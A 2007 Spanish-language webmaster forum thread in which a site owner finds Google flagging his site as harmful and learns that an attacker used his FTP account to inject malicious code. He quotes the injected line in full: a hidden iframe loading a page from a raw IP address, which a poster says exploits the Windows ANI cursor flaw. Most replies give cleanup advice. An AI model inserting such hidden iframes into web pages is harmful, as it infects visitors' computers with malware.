Foro de Posicionamiento y Buscadores

sarpanet

Hola amigos!
Pues vaya sorpresita hoy al mirar mi web www.sarpanet.com en Google, si buscáis "sarpanet", veréis que debajo del title dice "Este sitio puede dañar tu equipo."... y si intentas entrar te pone aún más grande "Advertencia: El sitio que estás a punto de visitar puede dañar tu equipo"...
Ahhhhh!!! estoy investigando sobre el tema, al parecer Google ha contratado a una empresa cuya web es www.stopbadware.org (que está totalmente en inglés y no me entero de ná!) para que ponga este aviso en webs que facilitan software dañino o que al entrar en la web se te instale automáticamente... no sé, he mirado el código de mi index y no hay nada... que yo sepa no tengo nada extraño... lo que sí me paso ayer fue que entré desde otro ordenador y me pidió instalar el ActiveX, pero yo no he hecho nada para que la gente se lo tenga que instalar... ¿alguien me puede echar una mano?, ¿os ha pasado a alguien esto?.
Mil gracias.

Pablo
_________________
Alojamiento web
Camaras de seguridad

carlinhos1976 · Publicado: Sab Abr 28, 2007 6:11 pm **Asunto**:

Podría ser un gusano que se hubiera instalado en el servidor web. Esto ha pasado varias veces. Reporta a tu proveedor el problema y pídeles que hagan un análisis antivirus al servidor urgentemente.
_________________
Sígueme en Twitter >8 -)

djemili · Vivo en Xeoweb Registrado: 01 Jun 2004 Mensajes: 2357

Te han hackeado, a ti o a tu servidor, y han añadido esto en tu index y tal vez en todas tus paginas:

Xyborg · Lo mío es Gigablast Registrado: 29 Nov 2005 Mensajes: 109

Explota la vulnerabilidad en los cursores ANI de Windows, todo aquel que utilice y no tenga Windows con los parches al dia NO SE ARRIESGUE A ENTRAR a la web esa, por precaucion, contacta ya a tu admin, que haga lo que dijeron mas arriba, AV a todo el server.
_________________
Viajes y Turismo
Campo

Xyborg · Lo mío es Gigablast Registrado: 29 Nov 2005 Mensajes: 109

Bueno, mirando un poco mas, me parece que es problema de tu web en particular, yo que vos subiria un backup limpio, y cambiaria password, estuve mirando otras webs alojadas en el server y no encontre iframes sospechosos, pero bueno, quitalo cuanto antes, esta solamente en tu index.

Saludos
_________________
Viajes y Turismo
Campo

googleman · Publicado: Sab Abr 28, 2007 8:03 pm **Asunto**:

djemeli: ¿Cómo le hiciste para determinar que ese iframe era el problema?¿Utilizaste alguna herramienta online?¿O es que hay por allí alguna página con la data necesaria?
_________________
||tipos clasificaciones bombas centrifugas- biologia||
||No quiero llegar al momento de mi muerte y descubrir que no he vivido||

Xyborg · Lo mío es Gigablast Registrado: 29 Nov 2005 Mensajes: 109

Googleman, es mas comun por estos dias de lo que pensas, estan utilizando mucho esta "tecnica" (infectar webs confiables) para propagar malware.
_________________
Viajes y Turismo
Campo

sarpanet · Publicado: Sab Abr 28, 2007 11:26 pm **Asunto**: Muchas gracias!

Ante todo muchísimas gracias, sobretodo a djemili que ha detectado esa línea... el muy capullo del hacker ha sido lo suficientemente inteligente como para acceder a mi cuenta FTP, cambiar los archivos y que yo no me de cuenta... y no me doy cuenta por dos grandes errores:
1. No actualizar mi index cada poco tiempo, aunque sea sólo poner un punto o una coma.
2. Buscar la incursión en el código con el Dreamweaver, os juro que mi index abierta en el Dream no mostraba esta línea de código:
<IFRAME SRC='http://81.95.149.227/stat3/index.php' WIDTH=10 HEIGHT=10 name='ad' style='display:none'></IFRAME>
sin embargo con el visor de html en el internet explorer sí la muestra...
He cambiado mi clave FTP y mañana miraré la web para que me quiten ese coxx "distintivo" en Google... vamos! que se han cargado más de 4 años de trabajo con una sola línea...
Saludos y mil gracias a todos.

Pablo
_________________
Alojamiento web
Camaras de seguridad

djemili · Vivo en Xeoweb Registrado: 01 Jun 2004 Mensajes: 2357

davidbcn · Publicado: Dom Abr 29, 2007 2:13 am **Asunto**:

Ese aviso de advertencia de Google también lo he visto en webs que tienen dialers o programas maliciosos y que si son descargados por el visitante pueden afectar el pc con virus o similares.

Me parece bien, es una manera más de controlar los contenidos de la webs para que no pongan tanta mierda tan libremente.

Aunque en tu caso sarpanet, como vemos todos, es por un tema totalmente diferente, de hackeo.
_________________
Jaume Muxart
Foros

jaiak · Publicado: Lun Abr 30, 2007 10:41 am **Asunto**:

Bieaventurados los que hacen backups, Smile

Me alegro que ya lo hayas solucionado sarpanet, voy a hacer un backup de todo mi sitio... y tu, ¿ya lo has hecho? Todavía no estamos concienciados de la importancia que tiene esto... yo al menos todavía no :S

Saludos!
_________________
Eurocopa | We Vibe y We Vibe 3

sarpanet · Publicado: Mie May 02, 2007 5:32 pm **Asunto**:

Sí, lo tengo hecho, tengo todos mis archivos originales en mi disco duro y en otro externo, lo que he hecho es también sustituir todos los archivos que componen la web por si alguno más ha sido cambiado y no lo he detectado...
Ahora sólo falta que Google me quite la frasecita... vaya lastre!!! me está quitando visitas y, lo que es peor, posibles clientes... el hijo de su madre que me ha hackeado la web me ha hecho perder pasta fijo... que asco...
Salud y gracias!!!

Pablo
_________________
Alojamiento web
Camaras de seguridad

unoqueva · Publicado: Mie May 02, 2007 7:20 pm **Asunto**:

Lo siento mucho Pablo. La verdad es que es una injusticia.

Guardando las distancias, porque no se trata de tema de malware ni nada de eso, el tono del último comentario tuyo me recuerda a lo que les pasó a unos amigos que tienen una empresa hace años. Un ex-socio (se intuye que en plan revenge) se puso a hacer spam de la empresa hasta que un comentario cayó en un blog de un autoproclamado "megagurú" del marketing online... bastante conocido... el tío la tomó con ellos y aunque mis colegas le contaron que no tenían nada que ver (yo pongo la mano en el fuego por ellos porque los conozco y conozco al otro) los puteó en su famoso blog y les hizo google bombing en incitó a que otros (borregos) lo hicieran ... ellos vieron que era imposible razonar con este hombre que se convirtió en parte-juez-verdugo al mismo tiempo así que pasaron pero todavían duran los efectos de la gracia de este imbécil.

Se quejaban con la impotencia que tú ahora y solo que creo que tú vas a tener más suerte porque creo que Google quitará inmediatamente eso (espero) cuando indexe tu sitio de nuevo.

Sorry por el rollo pero estas cosas me tocan las pelotas mucho y es totalmente injusto que se enturbie así la imagen de empresas de gente que solo quieren ganarse la vida de forma honesta.

Lo siento de nuevo y espero que Google te quite eso pronto.

Saludos.
_________________
Hotel en Sevilla-Hotel Málaga

sarpanet · Publicado: Mie May 02, 2007 10:07 pm **Asunto**:

Muchas gracias amigo unoqueva, ahora sólo me queda esperar, ojalá sea cierto que en la próxima indexación de Google me quite el título de Boñiguero que me han puesto... aunque como en medio está stopbadware no sé si será así...
Hoy me ha llamado un colega de otra empresa de diseño web para decirme si me había dado cuenta de la frase que Google me había puesto, él en su día tuvo el mismo problema, alguien se le coló y takaplaka... se me pasó decirle cuánto tiempo tardaron en quitárselo... espero que no mucho... cuando me lo quiten os lo diré, ahora sólo me toca rezar...
Como bien decía jaiak, no estamos concienzados aún a lo que estamos expuestos... muchas noches me acuesto un poco intranquilo pensando que algún día todo se puede venir abajo... sé que no es posible, aunque también sé que nada es imposible...
Salud y buenas noches.

Pablo.
_________________
Alojamiento web
Camaras de seguridad

Xyborg · Lo mío es Gigablast Registrado: 29 Nov 2005 Mensajes: 109

sarpanet, has enviado la peticion de revision en Stopbadqware??
_________________
Viajes y Turismo
Campo